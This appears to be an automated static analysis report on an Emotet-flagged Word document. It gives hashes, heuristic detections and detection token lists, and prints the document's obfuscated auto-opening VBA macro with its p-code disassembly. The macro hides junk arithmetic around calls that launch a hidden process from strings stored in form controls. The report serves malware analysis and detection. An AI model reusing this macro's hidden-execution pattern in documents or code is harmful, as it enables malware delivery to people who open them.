Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 991455093c967cca…

MALICIOUS

Office (OLE)

146.6 KB Created: 2019-03-20 07:55:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: a66c447a490bf0bec01a01e42f565d5f SHA-1: 657291282ef69da7aa887fd721be7a6c093d3e5f SHA-256: 991455093c967cca467b7686082c6f1896431278afeca3523605cad01bbe3b1f
190 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6901578-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6901578-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set DkAXAB = GetObject(JXZkGG.KAAZDc)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15739 bytes
SHA-256: ebffa6bdb48dcaa1c67f4c2f40a810acd3aa71f42a562c2ca78f94425908931c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bABkAAkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JXZkGG"
Attribute VB_Base = "0{C9E4D484-7ED1-4A9E-8AAA-FB4049FFACCA}{C13D5912-867D-4FBC-AF1A-A4B137E70440}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "JwUAAQUA"
Sub autoopen()
On Error Resume Next
   If QoQAAU = FCUQoQx Then
      ZA4AXAc = 740148012 * Hex(388608128) / 819101861 + Sqr(796073623) * 74742867 / CInt(683722712) * (198858864 * 195522963)
      SBAwADU = (585059973 - Chr(E4AZAU4A) / FkQQQA / 872647629 + VAZDAX_ / Fix(385129007 + Log(coBAAAA * Sgn(943410672) + SD_4kDwx / CSng(263917989))))
End If
   If ZAxoAxcD = kAcUC4 Then
      YXBBXQw = 390307595 * Hex(487326228) / 213075158 + Sqr(390577833) * 549641298 / CInt(717307618) * (253728359 * 230103812)
      nAAUAC = (632918236 - Chr(EoQxocDo) / TA4ZGAZQ / 974843141 + XCBQXQU / Fix(808848458 + Log(wZUAAB * Sgn(462879650) + XAUAQAA / CSng(560205990))))
End If
   If RADDAB = KGZAUk_ Then
      I1cADB4 = 374509441 * Hex(927386870) / 939820167 + Sqr(651645585) * 754383024 / CInt(442710205) * (138859583 * 480312107)
      rDAGAw = (930798243 - Chr(z_GxxUA_) / VQAAZc / 717000136 + tAQxAU1k / Fix(5581353 + Log(EAQ1okGA * Sgn(934042976) + wU1ABB_ / CSng(662376054))))
End If
Set DkAXAB = GetObject(JXZkGG.KAAZDc)
   If iA1Uoo4 = QAoQx4 Then
      w4_oABU_ = 523199817 * Hex(499557812) / 548069906 + Sqr(806870675) * 607474438 / CInt(695773955) * (540521087 * 532145967)
      MABAA1 = (732678661 - Chr(wCZXDG) / icGBBBC / 371866974 + dA4XDQ / Fix(874653699 + Log(LQCXAU_Q * Sgn(537789196) + JAwwCQ / CSng(582829857))))
End If
   If wZQckABo = pQGAAA Then
      WUUwQBC = 636248740 * Hex(297540682) / 22869338 + Sqr(696039598) * 779730060 / CInt(159590812) * (134932439 * 195806744)
      aQAAwAA = (103566581 - Chr(z_BAAwxB) / nUwxZD / 561802303 + rGAAQUAA / Fix(271671226 + Log(UkUAcXUU * Sgn(266035210) + dCGoQA / CSng(782421513))))
End If
   If IcUAAw = zkZQxAxG Then
      wBQQ_AA1 = 73388702 * Hex(706924395) / 189789370 + Sqr(328632967) * 893819377 / CInt(892671759) * (86331909 * 889325534)
      cAB_AAUB = (529018291 - Chr(NXBZAU) / UQCAAA4 / 544686683 + jUAAxk / Fix(260848049 + Log(K1DAw1A * Sgn(820579750) + rDZwDx_ / CSng(584442863))))
End If
DkAXAB.ShowWindow = 34847 - 34847
   If rAAAAA = OcDAxA Then
      HX_A_xA = 268356235 * Hex(943096616) / 863510668 + Sqr(311037146) * 61100493 / CInt(121554886) * (577288932 * 841262464)
      uZDADAA = (297829257 - Chr(hDZx4AA) / SA4AAZw / 561269094 + zUAGQk / Fix(763920411 + Log(oBAcUZQX * Sgn(437270093) + WAQAAQ1G / CSng(730724163))))
End If
   If NAwwAxA = fCAwAUUC Then
      mAUcXC1o = 837060003 * Hex(228383076) / 646016853 + Sqr(151558691) * 671928390 / CInt(417188366) * (52432892 * 42983134)
      YAUADx = (562873880 - Chr(IAB4Ax) / qBDx1ZkA / 73227912 + OAXxkD_ / Fix(383300184 + Log(PGAUoAAc * Sgn(637861944) + WAA_Qx / CSng(183742566))))
End If
   If TQXAXBBQ = B4Ao4ACw Then
      PQBXAw = 24443602 * Hex(454943240) / 834026292 + Sqr(708148475) * 163566224 / CInt(205525391) * (981523969 * 696999494)
      hDoXAQX = (579943260 - Chr(DQoGXA) / i4AxZcA / 394101855 + rB4_ADAB / Fix(345397091 + Log(n4AAUAZB * Sgn(149652622) + zAkUBA / CSng(604959696))))
End If
GetObject(JXZkGG.aCZAkCD). _
Create# FkQAZUUo + JXZkGG.vwAZAAGA + sxAABoA + JXZkGG.a_DAAcCA + oUwAGA + JXZkGG.KAxAQA4 + MADBAAD, vGxQUcBD, DkAXAB, kkUUA4BD
   If nQkCBxAG = dABCAAAU Then
      tCAAc1A_ = 837316285 * Hex(921431771) / 134830364 + Sqr(385449817) * 53325057 / CInt(746166708) * (383460613 * 107103266)
      mAAUcB = (428618010 - Chr(YACQAQXB) / KCBB1B / 340291954 + iDBUcA / Fix(647037553 + Log(JcG_AAG * Sgn(421305681) + LBoABBC / CSng(376620037))))
End If
   If jB_ZAwBk = bAGAUUA Then
      TADQ1AGG = 171593113 * Hex(325320704) / 768956617 + Sqr(192028052) * 285368658 / CInt(614248241) * (311309917 * 867208943)
      Z1_GUGAX = (476145553 - Chr(n4AAAco) / JwAQUACA / 234037785 + dCABZ_U / Fix(440480583 + Log(FA1XUUA * Sgn(41986097) + W4cZABC / CSng(278887116))))
End If
   If ZGAQ41C = qkDQA_AA Then
      pBAAAAC = 960532783 * Hex(796463753) / 966009341 + Sqr(60907982) * 430362508 / CInt(632328324) * (975199089 * 684655257)
      ucUUAXkZ = (299083116 - Chr(T1AQAQZ) / SkxGAk / 717059084 + YkBXAAA / Fix(67356010 + Log(hABZAAB * Sgn(507737656) + kB_XA_ / CSng(796030496))))
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/9203284fdee9496390a9d1e1770e35ea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/bABkAAkc - 1106 bytes
' Macros/VBA/JXZkGG - 1157 bytes
' Macros/VBA/JwUAAQUA - 7014 bytes
' Line #0:
' 	FuncDefn (Sub JwUAAQUA())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld QoQAAU 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0xC32C 0x2C1D 
' 	LitDI4 0xB080 0x1729 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x80A5 0x30D2 
' 	Div 
' 	LitDI4 0x1E97 0x2F73 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0x7C53 0x0474 
' 	Mul 
' 	LitDI4 0xC7D8 0x28C0 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x5870 0x0BDA 
' 	LitDI4 0x7193 0x0BA7 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St FCUQoQx 
' Line #4:
' 	LitDI4 0x4E85 0x22DF 
' 	Ld SBAwADU 
' 	ArgsLd Chr 0x0001 
' 	Ld E4AZAU4A 
' 	Div 
' 	LitDI4 0x8BCD 0x3403 
' 	Div 
' 	Sub 
' 	Ld FkQQQA 
' 	LitDI4 0x9A2F 0x16F4 
' 	Ld VAZDAX_ 
' 	LitDI4 0x4DF0 0x383B 
' 	FnSgn 
' 	Mul 
' 	Ld coBAAAA 
' 	LitDI4 0x11A5 0x0FBB 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St ZA4AXAc 
' Line #5:
' 	EndIfBlock 
' Line #6:
' 	Ld SD_4kDwx 
' 	Ld ZAxoAxcD 
' 	Eq 
' 	IfBlock 
' Line #7:
' 	LitDI4 0x9F0B 0x1743 
' 	LitDI4 0x0214 0x1D0C 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x44D6 0x0CB3 
' 	Div 
' 	LitDI4 0xBEA9 0x1747 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xDC52 0x20C2 
' 	Mul 
' 	LitDI4 0x3EE2 0x2AC1 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x9667 0x0F1F 
' 	LitDI4 0x1B04 0x0DB7 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St kAcUC4 
' Line #8:
' 	LitDI4 0x90DC 0x25B9 
' 	Ld nAAUAC 
' 	ArgsLd Chr 0x0001 
' 	Ld EoQxocDo 
' 	Div 
' 	LitDI4 0xED05 0x3A1A 
' 	Div 
' 	Sub 
' 	Ld TA4ZGAZQ 
' 	LitDI4 0x0C4A 0x3036 
' 	Ld XCBQXQU 
' 	LitDI4 0xFBA2 0x1B96 
' 	FnSgn 
' 	Mul 
' 	Ld wZUAAB 
' 	LitDI4 0x10A6 0x2164 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St YXBBXQw 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	Ld XAUAQAA 
' 	Ld RADDAB 
' 	Eq 
' 	IfBlock 
' Line #11:
' 	LitDI4 0x8F81 0x1652 
' 	LitDI4 0xCCF6 0x3746 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x8487 0x3804 
' 	Div 
' 	LitDI4 0x5291 0x26D7 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xF8B0 0x2CF6 
' 	Mul 
' 	LitDI4 0x38BD 0x1A63 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0xD43F 0x0846 
' 	LitDI4 0xFB2B 0x1CA0 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St KGZAUk_ 
' Line #12:
' 	LitDI4 0xDAA3 0x377A 
' 	Ld rDAGAw 
' 	ArgsLd Chr 0x0001 
' 	Ld z_GxxUA_ 
' 	Div 
' 	LitDI4 0x8DC8 0x2ABC 
' 	Div 
' 	Sub 
' 	Ld VQAAZc 
' 	LitDI4 0x2A29 0x0055 
' 	Ld tAQxAU1k 
' 	LitDI4 0x5D60 0x37AC 
' 	FnSgn 
' 	Mul 
' 	Ld EAQ1okGA 
' 	LitDI4 0x0E76 0x277B 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St I1cADB4 
' Line #13:
' 	EndIfBlock 
' Line #14:
' 	SetStmt 
' 	Ld MSForms 
' 	MemLd GetObject 
' 	ArgsLd DkAXAB 0x0001 
' 	Set wU1ABB_ 
' Line #15:
' 	Ld KAAZDc 
' 	Ld iA1Uoo4 
' 	Eq 
' 	IfBlock 
' Line #16:
' 	LitDI4 0x6549 0x1F2F 
' 	LitDI4 0xA5B4 0x1DC6 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0xE212 0x20AA 
' 	Div 
' 	LitDI4 0xDE93 0x3017 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0x5306 0x2435 
' 	Mul 
' 	LitDI4 0xAB03 0x2978 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0xB27F 0x2037 
' 	LitDI4 0xE72F 0x1FB7 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St QAoQx4 
' Line #17:
' 	LitDI4 0xCA05 0x2BAB 
' 	Ld MABAA1 
' 	ArgsLd Chr 0x0001 
' 	Ld wCZXDG 
' 	Div 
' 	LitDI4 0x3D5E 0x162A 
' 	Div 
' 	Sub 
' 	Ld icGBBBC 
' 	LitDI4 0x2803 0x3422 
' 	Ld dA4XDQ 
' 	LitDI4 0x030C 0x200E 
' 	FnSgn 
' 	Mul 
' 	Ld LQCXAU_Q 
' 	LitDI4 0x4721 0x22BD 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St w4_oABU_ 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	Ld JAwwCQ 
' 	Ld wZQckABo 
' 	Eq 
' 	IfBlock 
' Line #20:
' 	LitDI4 0x62A4 0x25EC 
' 	LitDI4 0x1C4A 0x11BC 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0xF55A 0x015C 
' 	Div 
' 	LitDI4 0xB8AE 0x297C 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xBC8C 0x2E79 
' 	Mul 
' 	LitDI4 0x299C 0x0983 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0xE7D7 0x080A 
' 	LitDI4 0xC618 0x0BAB 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St pQGAAA 
' Line #21:
' 	LitDI4 0x4CF5 0x062C 
' 	Ld aQAAwAA 
' 	ArgsLd Chr 0x0001 
' 	Ld z_BAAwxB 
' 	Div 
' 	LitDI4 0x6C3F 0x217C 
' 	Div 
' 	Sub 
' 	Ld nUwxZD 
' 	LitDI4 0x5FBA 0x1031 
' 	Ld rGAAQUAA 
' 	LitDI4 0x600A 0x0FDB 
' 	FnSgn 
' 	Mul 
' 	Ld UkUAcXUU 
' 	LitDI4 0xCE09 0x2EA2 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St WUUwQBC 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	Ld dCGoQA 
' 	Ld IcUAAw 
' 	Eq 
' 	IfBlock 
' Line #24:
' 	LitDI4 0xD29E 0x045F 
' 	LitDI4 0xCF6B 0x2A22 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0xF4BA 0x0B4F 
' 	Div 
' 	LitDI4 0x8A87 0x1396 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0x99F1 0x3546 
' 	Mul 
' 	LitDI4 0x170F 0x3535 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x5205 0x0525 
' 	LitDI4 0x07DE 0x3502 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St zkZQxAxG 
' Line #25:
' 	LitDI4 0x2DB3 0x1F88 
' 	Ld cAB_AAUB 
' 	ArgsLd Chr 0x0001 
' 	Ld NXBZAU 
' 	Div 
' 	LitDI4 0x425B 0x2077 
' 	Div 
' 	Sub 
' 	Ld UQCAAA4 
' 	LitDI4 0x39B1 0x0F8C 
' 	Ld jUAAxk 
' 	LitDI4 0x0DA6 0x30E9 
' 	FnSgn 
' 	Mul 
' 	Ld K1DAw1A 
' 	LitDI4 0xE3EF 0x22D5 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St wBQQ_AA1 
' Line #26:
' 	EndIfBlock 
' Line #27:
' 	LitDI4 0x881F 0x0000 
' 	LitDI4 0x881F 0x0000 
' 	Sub 
' 	Ld wU1ABB_ 
' 	MemSt rDZwDx_ 
' Line #28:
' 	Ld ShowWindow 
' 	Ld rAAAAA 
' 	Eq 
' 	IfBlock 
' Line #29:
' 	LitDI4 0xCA8B 0x0FFE 
' 	LitDI4 0x8328 0x3836 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x208C 0x3378 
' 	Div 
' 	LitDI4 0x0CDA 0x128A 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0x51CD 0x03A4 
' 	Mul 
' 	LitDI4 0xC7C6 0x073E 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0xBAE4 0x2268 
' 	LitDI4 0xA580 0x3224 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St OcDAxA 
' Line #30:
' 	LitDI4 0x8389 0x11C0 
' 	Ld uZDADAA 
' 	ArgsLd Chr 0x0001 
' 	Ld hDZx4AA 
' 	Div 
' 	LitDI4 0x4966 0x2174 
' 	Div 
' 	Sub 
' 	Ld SA4AAZw 
' 	LitDI4 0x801B 0x2D88 
' 	Ld zUAGQk 
' 	LitDI4 0x364D 0x1A10 
' 	FnSgn 
' 	Mul 
' 	Ld oBAcUZQX 
' 	LitDI4 0xF743 0x2B8D 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St HX_A_xA 
' Line #31:
' 	EndIfBlock 
' Line #32:
' 	Ld WAQAAQ1G 
' 	Ld NAwwAxA 
' 	Eq 
' 	IfBlock 
' Line #33:
' 	LitDI4 0x85A3 0x31E4 
' 	LitDI4 0xD964 0x0D9C 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x6F55 0x2681 
' 	Div 
' 	LitDI4 0x9A23 0x0908 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xD046 0x280C 
' 	Mul 
' 	LitDI4 0xCA0E 0x18DD 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x0FFC 0x0320 
' 	LitDI4 0xDEDE 0x028F 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St fCAwAUUC 
' Line #34:
' 	LitDI4 0xC618 0x218C 
' 	Ld YAUADx 
' 	ArgsLd Chr 0x0001 
' 	Ld IAB4Ax 
' 	Div 
' 	LitDI4 0x5E88 0x045D 
' 	Div 
' 	Sub 
' 	Ld qBDx1ZkA 
' 	LitDI4 0xB258 0x16D8 
' 	Ld OAXxkD_ 
' 	LitDI4 0x0038 0x2605 
' 	FnSgn 
' 	Mul 
' 	Ld PGAUoAAc 
' 	LitDI4 0xB066 0x0AF3 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St mAUcXC1o 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	Ld WAA_Qx 
' 	Ld TQXAXBBQ 
' 	Eq 
' 	IfBlock 
' Line #37:
' 	LitDI4 0xFAD2 0x0174 
' 	LitDI4 0xE208 0x1B1D 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x3B34 0x31B6 
' 	Div 
' 	LitDI4 0x7CFB 0x2A35 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xD290 0x09BF 
' 	Mul 
' 	LitDI4 0x118F 0x0C40 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0xDE01 0x3A80 
' 	LitDI4 0x5E46 0x298B 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St B4Ao4ACw 
' Line #38:
' 	LitDI4 0x3B5C 0x2291 
' 	Ld hDoXAQX 
' 	ArgsLd Chr 0x0001 
' 	Ld DQoGXA 
' 	Div 
' 	LitDI4 0x845F 0x177D 
' 	Div 
' 	Sub 
' 	Ld i4AxZcA 
' 	LitDI4 0x5763 0x1496 
' 	Ld rB4_ADAB 
' 	LitDI4 0x848E 0x08EB 
' 	FnSgn 
' 	Mul 
' 	Ld n4AAUAZB 
' 	LitDI4 0xF3D0 0x240E 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St PQBXAw 
' Line #39:
' 	EndIfBlock 
' Line #40:
' 	LineCont 0x0004 07 00 00 00
' 	Ld Create 
' 	Ld MSForms 
' 	MemLd FkQAZUUo 
' 	Add 
' 	Ld vwAZAAGA 
' 	Add 
' 	Ld MSForms 
' 	MemLd sxAABoA 
' 	Add 
' 	Ld a_DAAcCA 
' 	Add 
' 	Ld MSForms 
' 	MemLd oUwAGA 
' 	Add 
' 	Ld KAxAQA4 
' 	Add 
' 	Ld MADBAAD 
' 	Ld wU1ABB_ 
' 	Ld vGxQUcBD 
' 	Ld MSForms 
' 	MemLd zAkUBA 
' 	ArgsLd DkAXAB 0x0001 
' 	ArgsMemCall aCZAkCD# 0x0004 
' Line #41:
' 	Ld kkUUA4BD 
' 	Ld nQkCBxAG 
' 	Eq 
' 	IfBlock 
' Line #42:
' 	LitDI4 0x6EBD 0x31E8 
' 	LitDI4 0xEEDB 0x36EB 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x591C 0x0809 
' 	Div 
' 	LitDI4 0x7F59 0x16F9 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xAD01 0x032D 
' 	Mul 
' 	LitDI4 0x99B4 0x2C79 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x2505 0x16DB 
' 	LitDI4 0x4422 0x0662 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St dABCAAAU 
' Line #43:
' 	LitDI4 0x311A 0x198C 
' 	Ld mAAUcB 
' 	ArgsLd Chr 0x0001 
' 	Ld YACQAQXB 
' 	Div 
' 	LitDI4 0x7172 0x1448 
' 	Div 
' 	Sub 
' 	Ld KCBB1B 
' 	LitDI4 0x0271 0x2691 
' 	Ld iDBUcA 
' 	LitDI4 0x9D51 0x191C 
' 	FnSgn 
' 	Mul 
' 	Ld JcG_AAG 
' 	LitDI4 0xC405 0x1672 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St tCAAc1A_ 
' Line #44:
' 	EndIfBlock 
' Line #45:
' 	Ld LBoABBC 
' 	Ld jB_ZAwBk 
' 	Eq 
' 	IfBlock 
' Line #46:
' 	LitDI4 0x4D99 0x0A3A 
' 	LitDI4 0x0000 0x1364 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x58C9 0x2DD5 
' 	Div 
' 	LitDI4 0x1D94 0x0B72 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0x6152 0x1102 
' 	Mul 
' 	LitDI4 0xAF31 0x249C 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x365D 0x128E 
' 	LitDI4 0x8EEF 0x33B0 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St bAGAUUA 
' Line #47:
' 	LitDI4 0x6791 0x1C61 
' 	Ld Z1_GUGAX 
' 	ArgsLd Chr 0x0001 
' 	Ld n4AAAco 
' 	Div 
' 	LitDI4 0x2219 0x0DF3 
' 	Div 
' 	Sub 
' 	Ld JwAQUACA 
' 	LitDI4 0x3347 0x1A41 
' 	Ld dCABZ_U 
' 	LitDI4 0xA831 0x0280 
' 	FnSgn 
' 	Mul 
' 	Ld FA1XUUA 
' 	LitDI4 0x7ACC 0x109F 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St TADQ1AGG 
' Line #48:
' 	EndIfBlock 
' Line #49:
' 	Ld W4cZABC 
' 	Ld ZGAQ41C 
' 	Eq 
' 	IfBlock 
' Line #50:
' 	LitDI4 0x912F 0x3940 
' 	LitDI4 0x1289 0x2F79 
' 	ArgsLd Hex 0x0001 
' 	Mul 
' 	LitDI4 0x21FD 0x3994 
' 	Div 
' 	LitDI4 0x61CE 0x03A1 
' 	ArgsLd Sqr 0x0001 
' 	LitDI4 0xCF8C 0x19A6 
' 	Mul 
' 	LitDI4 0x9084 0x25B0 
' 	Coerce (Int) 
' 	Div 
' 	LitDI4 0x5B71 0x3A20 
' 	LitDI4 0x0299 0x28CF 
' 	Mul 
' 	Paren 
' 	Mul 
' 	Add 
' 	St qkDQA_AA 
' Line #51:
' 	LitDI4 0xA56C 0x11D3 
' 	Ld ucUUAXkZ 
' 	ArgsLd Chr 0x0001 
' 	Ld T1AQAQZ 
' 	Div 
' 	LitDI4 0x740C 0x2ABD 
' 	Div 
' 	Sub 
' 	Ld SkxGAk 
' 	LitDI4 0xC56A 0x0403 
' 	Ld YkBXAAA 
' 	LitDI4 0x7638 0x1E43 
' 	FnSgn 
' 	Mul 
' 	Ld hABZAAB 
' 	LitDI4 0x7620 0x2F72 
' 	Coerce (Sng) 
' 	Div 
' 	Add 
' 	ArgsLd Log 0x0001 
' 	Add 
' 	FnFix 
' 	Div 
' 	Add 
' 	Paren 
' 	St pBAAAAC 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	EndSub 
' Line #54: